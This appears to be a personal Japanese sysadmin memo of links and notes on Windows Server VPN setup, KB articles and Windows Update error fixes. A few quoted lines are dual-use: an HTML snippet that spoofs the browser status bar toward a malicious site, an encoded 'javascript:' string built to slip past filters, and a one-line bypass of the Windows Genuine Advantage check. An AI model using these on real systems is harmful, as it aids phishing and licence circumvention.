確認コマンド portqry.exe -n [SERVER IP] -e 1701 -p UDP UDP/500 UDP/1701 UDP/4500 ESP/50 SSTP のパケットフィルタ (確認してません。 たぶん TCP/443) Windows Server 2003 で IPSec トンネリングを構成する方法 [HOWTO] Windows Server 2003 でレイヤ 2 トンネリング プロトコルで使用する事前共有キーを構成する方法 ソフトイーサ、 VPNシステムのホームユース版 『PacketiX VPN 2.0 HOME Edition for Windows』 を発売 http://www.ascii24.com/news/i/soft/article/2006/02/21/660697-000.html 第3回 PPTPサーバの導入 1.Active Directoryの導入手順について http://www.atmarkit.co.jp/fwin2k/verification/vpn03/vpn03_01.html Windows Server2003でリモートユーザーがネットワークにアクセスできるようにする方法 http://www.windows-world.jp/ms_support/-/30222-1.html ステップバイステップ ガイド : サイト間の仮想プライベート ネットワーク接続の構築 http://www.microsoft.com/japan/technet/windowsserver/2003/technologies/directory/activedirectory/stepbystep/vpnconn.mspx  Windows Server 2003 の RRAS で インターネットVPN を組む場合は、ローカルセキュリティポリシーの設定に注意。  VPN サーバで   LAN Manager 認証レベル:NTLMv2 応答のみ送信(LM と NTLM を拒否する)  にすると認証が通りません。   LAN Manager 認証レベル:NTLMv2 応答のみ送信(LM を拒否する)  だと通ります。  ドメインで認証する場合はドメインコントローラセキュリティポリシーも同様に変更する必要があります。  繋がらなくて悩んだ…  ユーザ、パスワードが正常に送信されてなさげなのでバグっぽい…  ドメイン組んでいる場合は、setspn で URL のマッピングをする必要があるのかも。(試してないけど…)  なんか、VISTA の動きが変だ…(2007.11.28時点)  証明書を使った接続を行った場合や、ドメインサーバへワークグループの端末から接続した場合に  認証が通らないような、、、ユーザ名に Domain\User か User@Domain でドメインに何も入れなければ  接続出来たけど…  PPTP Ping 接続テスト用ツール  ・pptpclnt.exe(クライアント側で実行)  ・pptpsrv.exe (サーバ側で実行)  ※ Windows Server 2003 には付属しない。また動作させるには、TCP/1723、GRE を開いておく必要がある。  Windows XP または Windows Server 2003 を実行している VPN クライアント コンピュータは、リモート ネットワークのリソースにアクセスすることができません。  Windows XP ベースのコンピュータから仮想プライベート ネットワーク(VPN)接続を介してルーティング と リモート アクセス サービス サーバーに接続するのにコンピュータが 32 以上の静的なルートは確立できません。  PAP、CHAP または認証を使用して Windows Vista または Windows Server 2008 を実行しているコンピューターへの VPN 接続を作成することはできません。    Windows Vista や XP SP2 で NAT-T をサポートしていますが、デフォルトのままでは使用されないようです。     KEY: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\IPSec (XP)     KEY: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\PolicyAgent (Vista)     値の名前 : AssumeUDPEncapsulationContextOnSendRule     データ型 : REG_DWORD     値 : 1 又は 2           0: NAT-T 無効            1: 一方が NAT の背後           2: 両方が NAT の背後     ※このキーを追加後は再起動が必要。また、サーバ側にも設定が必要。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RasMan\Parameters (2003 Server)     値の名前 : NegotiateDH2048     データ型 : REG_DWORD     値 : 1     Windows XP および Windows 2000 用 L2TP/IPSec NAT-T 更新プログラム     http://support.microsoft.com/kb/818043     IPsec NAT 移動(NAT-T)の既定の動作は、 Windows XP Service Pack 2 で変更されます。     http://support.microsoft.com/kb/885407/ja     NAT デバイスの背後にある、Windows Vista のベースまたは Windows_Server_2008-ベースのコンピュータは、IPsec トンネル モードの接続を介して別のコンピュータと通信できません。     http://support.microsoft.com/kb/957624 【連載】ヤマハルータでつくるインターネットVPN http://journal.mycom.co.jp/series/vpn/001/index.html http://journal.mycom.co.jp/series/vpn/002/index.html
そのうちチェック Windows XP および Windows Server 2003 でレジストリをバックアップ、編集および復元する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;322756 291988 - 4 GB RAM チューニング機能と物理アドレス拡張スイッチの説明 http://go.microsoft.com/?linkid=2480120 [FIX] IIS 6.0 でパスワード変更ページを使用するときにさまざまな問題が発生する http://support.microsoft.com/default.aspx?scid=kb;ja;833734 できます! Windows ネットワーク上での Mac のセキュリティ保護 http://go.microsoft.com/?linkid=3376700 Windows は CD-ROM 上のファイルの時刻をローカル タイム ゾーンに調整 http://support.microsoft.com/default.aspx?scid=kb;ja;242059 Windows Server 2003 証明機関と Entrust CA で相互認証を行う方法 http://support.microsoft.com/default.aspx?scid=kb;ja;290760 [FIX] 32 ビット版の SQL Server 2000 SP4 を実行するコンピュータで、AWE を有効にすると使用できないメモリ領域がある http://support.microsoft.com/default.aspx?scid=kb;ja;899761 セキュリティ更新プログラム 896428 により、Windows Server 2003 および Windows XP で Telnet クライアントが追加の環境変数を公開できる新しいレジストリ キーが追加される http://support.microsoft.com/default.aspx?scid=kb;ja;900934 [RDS]Windows 2000 での RDS の構成について http://support.microsoft.com/default.aspx?scid=kb;ja;250536 [netshow]Windows Media Format 7 SDK Readme http://support.microsoft.com/default.aspx?scid=kb;ja;417666 Windows XP の起動時にシリアル マウスの検出を抑止する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;889045 Windows XP で MFC アプリケーションを実行すると GDI オブジェクトでメモリ リークが発生する http://support.microsoft.com/default.aspx?scid=kb;ja;319740 Windows 2000、Windows XP および Windows Server 2003 のメモリ ダンプ ファイル オプションの概要 http://support.microsoft.com/default.aspx?scid=kb;ja;254649 Windows Media サービス 9 シリーズの動的再生リスト生成時におけるユーザーコンテキスト変数の取り扱いについての説明 http://support.microsoft.com/default.aspx?scid=kb;ja;899647 Windows Media Player 9 でストリーミング コンテンツの再生が途中で停止するときの対処方法 http://support.microsoft.com/default.aspx?scid=kb;ja;899635 Windows Server 2003 でフォルダ リダイレクトを使用して Application Data をリダイレクトすると正しく表示されないことがある http://support.microsoft.com/default.aspx?scid=kb;ja;884357 クラスタ化されていない Windows 2000 Server に MSDTC を再インストールする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;279786 サイト URL フォルダ名 ファイル名に使用できない文字 http://go.microsoft.com/?linkid=3492104 Windows Shell 内の未チェックのバッファが原因でコードが実行される http://go.microsoft.com/?linkid=3492102 Windows XP で MFC アプリケーションを実行すると GDI オブジェクトでメモリ リークが発生する http://go.microsoft.com/?linkid=3492103 Windows 2000 Service Pack Update.exe のコマンドライン スイッチ http://support.microsoft.com/default.aspx?scid=kb;ja;262839 Windows XP Service Pack 2 でリモート デバッグを有効にする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;833977 Windows 2000 SP4 対応の更新プログラム ロールアップ 1 (KB891861) の適用後に Excel や Word でフロッピーディスクにアクセスすると応答を停止する場合がある http://support.microsoft.com/default.aspx?scid=kb;ja;904130 Windows の DCOM サポートを無効にする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;825750 [HOWTO] Windows Server 2003 でサービスのスタートアップ アクセス許可のトラブルシューティングを行う方法 http://support.microsoft.com/default.aspx?scid=kb;ja;327545 [HOWTO] Windows Server 2003 でイントラネットのユーザーとグループのアクセス許可を構成する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;326214 892340 - Microsoft Windows AntiSpyware (Beta) によってプログラムがスパイウェアと判定される http://go.microsoft.com/?linkid=3707725 Windows Server 2003 ターミナル サーバーのライセンスの問題と展開のための要件 http://support.microsoft.com/default.aspx?scid=kb;ja;823313 [HOWTO] .NET アプリケーション用に SQL Server のセキュリティを構成する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;815154 Windowsでイントラ・ブログを構築する(前編) http://www.atmarkit.co.jp/fwin2k/operation/intrablog01/intrablog01_01.html Apache 2.0の必須設定と基本セキュリティ対策 http://www.atmarkit.co.jp/flinux/rensai/apache2_01/apache01a.html 第5回 ASP.NETアプリケーション、DotNetNukeをインストールする http://www.atmarkit.co.jp/fwin2k/verification/web200805/web200805_01.html W3C,公開鍵管理仕様「XKMS 2.0」を勧告として公開 http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20050629/163538/ Google Maps の API http://maps.google.com/ http://www.google.com/apis/maps/signup.html Google Maps API Documentation http://www.google.com/apis/maps/documentation/ 一部のマニアの間で人気らしい。  東芝の「RD-H1」  http://www3.toshiba.co.jp/hdd-dvd/products/hddrec/  「VirtualRD for Windows」(および「番組ナビゲータ」)  http://www.roy.hi-ho.ne.jp/masao/rd/ Dictionary オブジェクト http://www.microsoft.com/japan/msdn/library/ja/script56/html/jsobjDictionary.asp # ちょっと使う機会があったので。 USBハードディスクにもう1つのWindows環境を構築できる「BOOT革命/USB」 http://nikkeibp.jp/wcs/j/comp/387579 IIS 6.0のFTPサーバでユーザー・フォルダを分離する(Active Directory編) http://www.atmarkit.co.jp/fwin2k/win2ktips/588ftpad/ftpad.html IIS 6.0のFTPサーバでユーザー・フォルダを分離する(基本編) http://www.atmarkit.co.jp/fwin2k/win2ktips/586ftpisolate/ftpisolate.html tftpサービスを起動する http://www.atmarkit.co.jp/fwin2k/win2ktips/561tftpd/561tftpd.html IIS 6.0のWeb拡張機能を有効にする http://www.atmarkit.co.jp/fwin2k/win2ktips/546iis6func/iis6func.html IISのログ・ファイルを午前0時に切り替える http://www.atmarkit.co.jp/fwin2k/win2ktips/486iislog/iislog.html IISの標準FTPバナー・メッセージを表示させない http://www.atmarkit.co.jp/fwin2k/win2ktips/602ftpbanner/ftpbanner.html タスク・スケジューラをコマンド・プロンプトから制御する http://www.atmarkit.co.jp/fwin2k/win2ktips/582schtasks/schtasks.html ファイル名の表示順序を変更する http://www.atmarkit.co.jp/fwin2k/win2ktips/342xpsort/xpsort.html 905226: Windows XP または Windows 2000 Professional の確認時にWindows Genuine Advantage (正規 Windows 推奨プログラム) の確認処理が完了しない (Microsoft) http://support.microsoft.com/default.aspx?scid=kb;ja;905226 W32Time により頻繁にイベント ID 50 がイベント ログに記録されWindows Server 2003 および Windows XP で時刻の同期に失敗する http://support.microsoft.com/default.aspx?scid=kb;ja;830092 Windows 2000 または Windows Server 2003 で、ターミナル サービスセッションからのログオフに予想以上の時間がかかる http://support.microsoft.com/default.aspx?scid=kb;ja;828326 Windows XP および Windows Server 2003 における 32 ビット版と 64 ビット版のメモリ構造の比較 http://support.microsoft.com/default.aspx?scid=kb;ja;294418 Windows XP または Windows Server 2003 セットアップ後の HAL オプション http://support.microsoft.com/default.aspx?scid=kb;ja;309283 Windows XP Service Pack 2、Windows XP Tablet PC Edition 2005および Windows Server 2003 のデータ実行防止 (DEP) 機能の詳細 http://support.microsoft.com/default.aspx?scid=kb;ja;875352 Windows XP ベース、および Windows 2000 ベースのコンピュータからファイル サーバー上の共有フォルダにファイルを保存できない http://support.microsoft.com/default.aspx?scid=kb;ja;895900 Windows Server 2003 R2 のサイトオープン http://go.microsoft.com/?linkid=3765248 [HOWTO] Windows Server 2003 で SNMP サービスのネットワーク セキュリティを構成する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;324261 Windows Server 2003 でファイアウォール クライアントと Web プロキシ クライアントの自動検出を構成する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;816320 Windows XP の Sysprep の新機能 http://support.microsoft.com/default.aspx?scid=kb;ja;282190 [BUG] プロトコルとして TCP/IP のみが指定されている場合にSQL Server が TCP/IP ソケットで受信待ちをしないことがある http://support.microsoft.com/default.aspx?scid=kb;ja;306865 [FIX] 証明機関の名前が Windows 2000 コンピュータのホスト名と同じ場合に SQL Server 2000 に接続できない http://support.microsoft.com/default.aspx?scid=kb;ja;302409 [HOWTO] SQL Server 2000 のインストール方法 - ローカルへの基本インストール http://support.microsoft.com/default.aspx?scid=kb;ja;303747 Microsoft 管理コンソールで SQL Server 2000 用に SSL 暗号化を有効にする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;316898 SQL Server の 8198 エラーのトラブルシューティング方法 http://support.microsoft.com/default.aspx?scid=kb;ja;834124 SQL Server 2000 の sysprocesses テーブル内の waittype 列および lastwaittype 列 http://support.microsoft.com/default.aspx?scid=kb;ja;822101 [FIX] Server サービスが実行されていないと MSDE 2000 をインストールできない http://support.microsoft.com/default.aspx?scid=kb;ja;829386 Windows Server 2003 起動時に DFS サービスの起動に失敗する http://support.microsoft.com/default.aspx?scid=kb;ja;902038 Windows Server 2003 で TCP/IP フィルタリングを構成する方法 http://support.microsoft.com/kb/816792/ja ネットワーク運用におけるセキュリティ:まずはセキュリティの基本的な考え方から理解する http://www.itmedia.co.jp/enterprise/articles/0508/12/news031.html 解説:ドメイン乗っ取り問題とは何か? http://www.itmedia.co.jp/enterprise/articles/0508/12/news002.html 情報漏えい対策ガイド (Windows 編) http://www.exconn.net/Blogs/team02/archive/2005/08/19/2514.aspx Windows 2000 Server の TCP/IP の脆弱性と対策 http://www.microsoft.com/japan/technet/security/guidance/secmod150.mspx 簡易ファイルの共有および ForceGuest についての説明 http://go.microsoft.com/?linkid=3878881 Microsoft 管理コンソールで SQL Server 2000 用に SSL 暗号化を有効にする方法 http://go.microsoft.com/?linkid=3875308 905226: Windows XP または Windows 2000 Professional の確認時に Windows Genuine Advantage (正規 Windows 推奨プログラム) の確認処理が完了しない (Microsoft) http://support.microsoft.com/default.aspx?scid=kb;ja;905226 マルチタスク対応Javaアプリケーションの作成 http://japan.internet.com/developer/20050822/27.html 柔軟な.NET構成セクションハンドラ(.config)の作成 http://japan.internet.com/developer/20050822/26.html 第1回:実環境テストの必要性/導入前にテストをしよう http://www.pc-view.net/Security/050818/index.html 第2回:侵入防御をチェックする/内部向けへの防御 http://www.pc-view.net/Security/050818/page2.html [HOWTO] Windows XP で高度なクリーン ブート トラブルシューティングを実行する http://support.microsoft.com/default.aspx?scid=kb;ja;316434 Windows でカーネル モードのフィルタ ドライバを一時的に無効にする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;816071 Driver Verifier を使用して Windows ドライバをトラブルシューティングする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;244617 Windows サーバー オペレーティング システムの既知のセキュリティ識別子 http://support.microsoft.com/default.aspx?scid=kb;ja;243330 IPAとNRIセキュア、米NISTのセキュリティ情報を日本語で一般公開 http://internet.watch.impress.co.jp/cda/news/2005/08/29/8932.html 海外情報セキュリティ関連文書の翻訳・調査研究(NIST文書など) (IPA) http://www.ipa.go.jp/security/publications/nist/index.html 海外の情報セキュリティ関連ドキュメント (NRIセキュア) http://www.nri-secure.co.jp/news_alert/report/nist/nist_report.html Windows XP および Windows Server 2003 の Boot.ini ファイルで使用可能なスイッチ オプション http://support.microsoft.com/default.aspx?scid=kb;ja;833721 [INF] SQL Server 2000 のデータベース コピー ウィザードの説明とトラブルシューティング http://support.microsoft.com/default.aspx?scid=kb;ja;274463 クラスタ化されていない Windows 2000 Server に MSDTC を再インストールする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;279786 ゲート、車載向けのHDDプレーヤー自作キット−シガーソケット給電に対応。車載用リモコン付属 http://www.watch.impress.co.jp/av/docs/20050804/gate.htm 夜になるとネットワークが遅くなる? http://www.atmarkit.co.jp/fnetwork/rensai/troutol10/01.html Windows Server 2003 におけるシャットダウン時の問題のトラブルシューティング http://support.microsoft.com/default.aspx?scid=kb;ja;324268 アレイ コントローラのインストール後、Windows Server 2003 が応答を停止する http://support.microsoft.com/default.aspx?scid=kb;ja;823728 [HOWTO] Windows Server 2003 でインターネット インフォメーション サービスの Web 認証を構成する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;324276 Windows Server 2003 のワークグループでネットワーク経由でファイルとフォルダを共有する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;323420 [HOWTO] Windows Server 2003 のデバイス マネージャに表示される不明なデバイスのトラブルシューティングの方法 http://support.microsoft.com/default.aspx?scid=kb;ja;327756 [INF] よく寄せられる質問 - SQL Server 2000 - table 変数 http://support.microsoft.com/default.aspx?scid=kb;ja;305977 [HOWTO] SQL Server で tempdb データベースを圧縮する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;307487 プールが無効な場合の SQL Server ドライバ用の TCP/IP 設定 http://support.microsoft.com/default.aspx?scid=kb;ja;328476 SQL Server 2000 ローカル データベースのネットワーク接続をセキュリティで保護する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;814130 Windows XP Professional の高速ログオン最適化機能について http://support.microsoft.com/default.aspx?scid=kb;ja;305293 Windows Server 2003 で MS-DOS ネットワーク起動ディスクを作成する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;325848 Windows Server 2003 でクライアントをターミナル サービスに接続する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;814585 Windows Server 2003 で移動ユーザー プロファイルを作成する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;324749 Windows Server 2003 のシステムおよびブート パーティションをミラー化する方法 (RAID1) http://support.microsoft.com/default.aspx?scid=kb;ja;323432 JVN、RSSによる脆弱性対策情報の配信をスタート http://www.itmedia.co.jp/enterprise/articles/0509/09/news052.html Orca データベース エディタを使用して Windows インストーラ ファイルを編集する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;255905 SQL CLR vs. Transact-SQLの真実 SQL Server 2005 CTPレビュー(開発者編) http://www.atmarkit.co.jp/misc/ct.php?id=ws590701 Windows Media Player のマルチメディア ファイル形式 http://support.microsoft.com/default.aspx?scid=kb;ja;316992  独自のパラメータとコマンドを使う  http://msdn.microsoft.com/library/ja/wmplay/mmp_sdk/tousecustomtagsandcommands.asp  ASX ファイルは PARAM 要素を使って独自に拡張出来たのか・・・ AJAX 使った操作が楽になるかな。 セキュリティ情報 RSS Part2 http://www.exconn.net/Blogs/team02/archive/2005/09/06/2910.aspx 906522: 通常とは異なる記述の javascript: プロトコルが実行される http://support.microsoft.com/kb/906522/JA/  javasc%26amp%3b%2309%3bript ↓  javasc&#09;ript  ↓  javasc ript  ↓  javascript と、いう事らしい。 IEやOperaにステータス・バーを偽装できる問題 http://itpro.nikkeibp.co.jp/article/NEWS/20051117/224750/ IE <form action="[malicious site]"> <a href="[trusted site]"><input type="image" src="[image]"></a> </form> OPERA <form action="[malicious site]"> <a href="[trusted site]"><input type="image" src="[image]" title="[trusted site]"></a> </form> Internet Explorer 6 の使用に役立つリソース http://support.microsoft.com/default.aspx?scid=kb;ja;867470 UNICODE バグ http://rocketeer.dip.jp/unicode/index.htm Windows 2000 Server の TCP/IP の脆弱性と対策 http://www.microsoft.com/japan/technet/security/guidance/secmod150.mspx 簡易ファイルの共有および ForceGuest についての説明 http://go.microsoft.com/?linkid=3878881 情報漏えい対策ガイド (Windows 編) 提供開始 http://go.microsoft.com/?linkid=3875293 Microsoft 管理コンソールで SQL Server 2000 用に SSL 暗号化を有効にする方法 http://go.microsoft.com/?linkid=3875308 Windows XP または Windows Server 2003 でファイルを検索しようとすると、Explorer.exe プロセスが予期せず終了することがある http://support.microsoft.com/kb/900004/ja Windows Server 2003 へのアップグレード中にブート パーティションを拡張する方法 http://support.microsoft.com/kb/325857/ja Windows Server 2003 で統合ルートをサポートするための分散ファイル システムの更新プログラム http://support.microsoft.com/kb/829885/ja  実用的になったディスククォータ機能  http://www.atmarkit.co.jp/fwin2k/special/2003r2_02/2003r2_02_01.html  第6回 アクセス・ベースのディレクトリ列挙ABE 3.ABEツールの利用方法  http://www.atmarkit.co.jp/fwin2k/special/2003sp1_06/2003sp1_06_03.html  http://www.microsoft.com/downloads/details.aspx?FamilyId=04A563D9-78D9-4342-A485-B030AC442084&displaylang=en  Tips:業務に不要なプログラムの実行をグループ・ポリシーで禁止する  http://www.atmarkit.co.jp/fwin2k/win2ktips/631rejectexec/rejectexec.html  Windows Server 2003 でソフトウェアの制限のポリシーを使用する方法  http://support.microsoft.com/default.aspx?scid=kb;ja;324036  ハッシュの規則を作成する  http://www.microsoft.com/resources/documentation/windowsserv/2003/standard/proddocs/ja-jp/SRP_hash.asp 共有パソコンをMS製無償ツールで保護する方法 http://itpro.nikkeibp.co.jp/article/COLUMN/20060717/243484/ OSを自作する時代がやってきた http://itpro.nikkeibp.co.jp/article/OPINION/20060721/243952/
Windows Update 関連のエラー Windows Update version 5 にて更新プログラムをインストールする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;873475 Windows Update version 5 に関してよく寄せられる質問について http://support.microsoft.com/default.aspx?scid=kb;ja;873476 Windows Update に関する技術情報 Windows Update サイトにアクセスしようとすると 0x80072EFD エラーが表示される Windows Update サイトにアクセスしようとすると、0x800B0001 エラーが表示されます。 Windows Update サイトで利用可能な更新を検索すると 0x80248011 エラーが表示される Windows Update サイトで利用可能な更新を検索すると 検索中に 0x800A01AD エラーが表示される Windows Update サイトで利用可能な更新を検索すると 0x80244001 エラーが表示される Windows Update サイトで利用可能な更新を検索すると 0x80070002 エラーが表示される Windows Update サイトで利用可能な更新を検索すると 0x8007043B エラーが表示される Windows Update サイトで利用可能な更新を検索すると 0x800A0046 エラーが表示される Windows Update サイトで利用可能な更新を検索すると 検索中に 0x80072F8F エラーが表示される Windows Update でエラー番号 0x800A01AE が表示される Windows Update サイトにアクセスすると 0x80245003 エラーが表示される Windows Update でエラー番号 0x800C0005 が表示される場合の対処方法 Windows Update サイトにアクセスしようとすると 0x80072EFD エラーが表示される プロキシサーバーを利用して Windows Update にアクセスすると "エラー 0x80072EFD" が表示される Windows Update でエラー番号 0x8024402C が表示される場合の対処方法 Windows Update サイトで利用可能な更新を検索すると 0x80244001 エラーが表示される Windows Update でエラー番号 0x80070424 が表示される場合の対処方法 Windows Update でエラー番号 0x80072EE2 が表示される場合の対処方法 Windows Update でエラー番号 0x800A01AD が表示される場合の対処方法 Windows Update でエラー番号 0x80240030 が表示される場合の対処方法 Windows Update でエラーが発生した場合のエラー番号について Windows Update でエラー番号 0x8024502D が表示される場合の対処方法 Windows Update サイトにアクセスしようとすると 0x8DDD0004 エラーが表示されます Windows Update サイトで利用可能な更新を検索すると 0x80248011 エラーが表示される Windows Update でエラー番号 0x800A138F が表示される場合の対処方法 Windows Vista、Windows 7、Windows Server 2008 と Windows Server 2008 R2 に更新プログラムをインストールすることができません。 Windows Update version 5 関連のサポート技術情報一覧 http://support.microsoft.com/default.aspx?scid=kb;ja;875571 Windows Update version 5 の総合情報 http://support.microsoft.com/default.aspx?scid=kb;ja;873474 Windows Update version 5 にて更新プログラムをインストールする方法 http://support.microsoft.com/default.aspx?scid=kb;ja;873475 Windows Update トラブルシューティングの使い方 http://support.microsoft.com/default.aspx?scid=kb;ja;873479 Windows Update Web Web サイトでアクセスするとき、エラー「 0x8007041D」を表示します。 http://support.microsoft.com/kb/902322/ja Windows Update でエラー番号 0x800A01AE が表示される http://support.microsoft.com/default.aspx?scid=kb;ja;885963 機能していなかったり Windows Update。 http://support.microsoft.com/default.aspx?scid=kb;ja;555989 パソコン用語 - Windows Update (ウィンドウズ アップデート) とは http://support.microsoft.com/default.aspx?scid=kb;ja;878554 利用している Windows Update のバージョンを確認するには http://support.microsoft.com/default.aspx?scid=kb;ja;875569 Windows Update version 4 から Windows Update version 5 への移行について http://support.microsoft.com/default.aspx?scid=kb;ja;875568 Windows Update でエラー番号 0x800C0005 が表示される場合の対処方法 http://support.microsoft.com/default.aspx?scid=kb;ja;834406 Windows Update v5 で更新プログラムの非表示と復元を設定する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;875570 Windows Update カタログ から Windows の更新を取得する方法 http://support.microsoft.com/default.aspx?scid=kb;ja;418435 907436: Windows Genuine Advantage を利用する際のセキュリティ設定 http://support.microsoft.com/kb/907436/JA/ あとはここで。 Boing Boing: Microsoft "Genuine Advantage" cracked in 24h: window.g_sDisableWGACheck='all' http://www.boingboing.net/2005/07/28/microsoft_genuine_ad.html Windows Update を行う前にアドレスバーに javascript:void(window.g_sDisableWGACheck='all') と打ち込むとチェックをすり抜けるって話。 ------------------------------------------------------------------------------------------------------------- Windows Server Word 12月号より http://www.windows-world.jp/project/ イベントログに「Automatic Updates サービスは起動時に停止しました」 と出ている場合は、「Windows Update Agent2.0」が正しく機能していない (一部のファイルが無いか破損している場合等)と考えられます。 この場合、Windows Update Agent2.0 を再インストールすると修復出来る 可能性があります。   Windows Update V6 を利用するにはさらに   ・Windows Installer3.1   ・バックグラウンドインテリジェント転送サービス(BITS2.0)   が必要です。 ■Windows Update Agent2.0(WindowsXP/Server2003 x86版) http://go.microsoft.com/fwlink/?LinkId=43264 ■Windows Update Agent2.0(WindowsXP/Server2003 x64版) http://go.microsoft.com/fwlink/?LinkId=43265 ■Windows Update Agent2.0(WindowsXP/Server2003 Itanium版) http://go.microsoft.com/fwlink/?LinkId=42538 ■Windows Installer3.1 Redistributable(v2) - 日本語 http://www.microsoft.com/downloads/details.aspx?familyid=889482FC-5F56-4A38-B838-DE776FD4138C&displaylang=ja ■Windows2000用BITS 2.0とWinHTTP 5.1用更新プログラム(KB842773) http://www.microsoft.com/downloads/details.aspx?familyid=3EE866A0-3A09-4FDF-8BDB-C906850AB9F2&displaylang=ja ■WindowsXP用BITS 2.0とWinHTTP 5.1用更新プログラム(KB842773) http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyId=B93356B1-BA43-480F-983D-EB19368F9047 ■Windows Server2003用BITS 2.0とWinHTTP 5.1用更新プログラム(KB842773) http://www.microsoft.com/downloads/details.aspx?familyid=3FD31F05-D091-49B3-8A80-BF9B83261372&displaylang=ja  Windows Update Agent2.0 を再インストールする場合   そのまま実行しても動きませんので、以下手順で再インストール   1.サービスから、Automatic Updates を自動から手動に変更し     (これは、再インストール後に自動で戻ります)再起動。   2.「/wuforce」オプション付きでインストール     (これは、既にセットアップされている Windows Update Agent2.0 が      存在しても強制的にインストールする為のオプション)      コマンドから、 WindowsUpdateAgent20-x86.exe /wuforce   3.必要に応じて Installer3.1 と BIT2.0 をインストール。 Windows 2000 の場合はたぶんこれ http://support.microsoft.com/kb/937364/ ■Office 2003 がインストールされている PC で CPU負荷 100% になる件   サポート技術情報 937383 Microsoft Update または Windows Update が終了しない   http://support.microsoft.com/kb/937383/ja    解決方法は、KB927891 修正モジュールと Windows Update Agent (WUA) 3.0 client の両方をインストール    KB927891    http://support.microsoft.com/kb/927891    WUA 3.0 client    http://support.microsoft.com/kb/937383/ja   関連   @police-Microsoft Update または Windows Update が終了しない現象について   http://www.cyberpolice.go.jp/important/2007/20070511_162231.html   Microsoftのアップデートに不具合、CPU使用率が100%近くに   http://www.itmedia.co.jp/news/articles/0705/12/news010.html   自動更新などでOfficeパッチが配布されると svchosts.exe がおかしくなる不具合、修正プログラムあり?(KB927891)   http://bbs.hotfix.jp/ShowPost.aspx?PostID=6485   WSUS配下でCPU使用率100%   http://www.exconn.net/Forums/ShowPost.aspx?PostID=11753   Windows Server Update Services は、 Windows Server 2003 での大きな Windows 更新ファイルはダウンロードできません。   http://support.microsoft.com/kb/888303/ja Microsoft Update を利用している場合で、更新エラーが表示される場合は、一度 Windows Update に戻してみると解決するかもしれません。 Microsoft Update の利用を中止するには http://support.microsoft.com/kb/902297 Windows Update に関する技術情報 http://support.microsoft.com/kb/884101 Windows Update Web サイトまたは Microsoft Update Web サイトで利用可能な更新プログラムを検索するとエラー メッセージが表示される http://support.microsoft.com/kb/883821 Windows Vista および Windows Server 2008 用のシステム更新準備ツールについて http://support.microsoft.com/kb/947821 Windows 7/Server 2008のWindows Updateの使い方(基本編) http://www.atmarkit.co.jp/fwin2k/win2ktips/1227w7wup1/w7wup1.html Windows Update を実行後、シャットダウン時にフリーズする、またはウイルス対策ソフトから警告メッセージが表示される場合 http://blogs.technet.com/b/jpsecurity/archive/2010/06/23/3339847.aspx
Windows Update に毎回 同じ物が表示される場合の対策 Windows Update サイトの "更新の一覧" にインストールした更新の選択が再度表示される場合がある Windows Update 設定をリセットする方法はでしょうか。 コマンドから rem サービス停止 net stop bits net stop wuauserv rem qmgr*.dat ファイルを削除 Del \Programdata\Microsoft\network\downloader\qmgr*.dat rem ファイルを再登録 cd/d %windir%\system32 regsvr32.exe atl.dll regsvr32.exe urlmon.dll regsvr32.exe mshtml.dll regsvr32.exe shdocvw.dll regsvr32.exe browseui.dll regsvr32.exe jscript.dll regsvr32.exe vbscript.dll regsvr32.exe scrrun.dll regsvr32.exe msxml.dll regsvr32.exe msxml3.dll regsvr32.exe msxml6.dll regsvr32.exe actxprxy.dll regsvr32.exe softpub.dll regsvr32.exe wintrust.dll regsvr32.exe dssenh.dll regsvr32.exe rsaenh.dll regsvr32.exe gpkcsp.dll regsvr32.exe sccbase.dll regsvr32.exe slbcsp.dll regsvr32.exe cryptdlg.dll regsvr32.exe oleaut32.dll regsvr32.exe ole32.dll regsvr32.exe shell32.dll regsvr32.exe initpki.dll regsvr32.exe wuapi.dll regsvr32.exe wuaueng.dll regsvr32.exe wuaueng1.dll regsvr32.exe wucltui.dll regsvr32.exe wups.dll regsvr32.exe wups2.dll regsvr32.exe wuweb.dll regsvr32.exe qmgr.dll regsvr32.exe qmgrprxy.dll regsvr32.exe wucltux.dll regsvr32.exe muweb.dll regsvr32.exe wuwebv.dll rem Winsock をリセット netsh reset winsock rem ↓XP, Server 2003 を実行している場合 proxycfg.exe -d rem サービス再起動 net start bits net start wuauserv rem ↓Vista, Server 2008 を実行している場合 bitsadmin.exe/reset/allusers 0x643 or 0x80070643 が出る場合。 .NET Framework が壊れているので .Net Cleanup Utility を使って .NET Framework をアンインストールする。  When installing updates using Windows update or Microsoft Update you may receive Error 0x643 or 0x80070643  http://support.microsoft.com/kb/976982/ Patch Registration Cleanup Tool について http://support.microsoft.com/kb/976220 更新プログラムの登録の不正または破損に関連する問題を解決することができるツールで 更新プログラムを再インストールできるように戻すことができる。 2010.7 から出るエラーについて  MS Update のサイト証明が7月9日で期限切れになっているため発生。  いまだに以下のエラーが出る場合     ログの名前: Application   ソース: Microsoft-Windows-CAPI2   イベント ID:4107   説明:   <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab>   にある自動更新 cab ファイルからサード パーティのルート一覧を抽出できませんでした。   エラー: 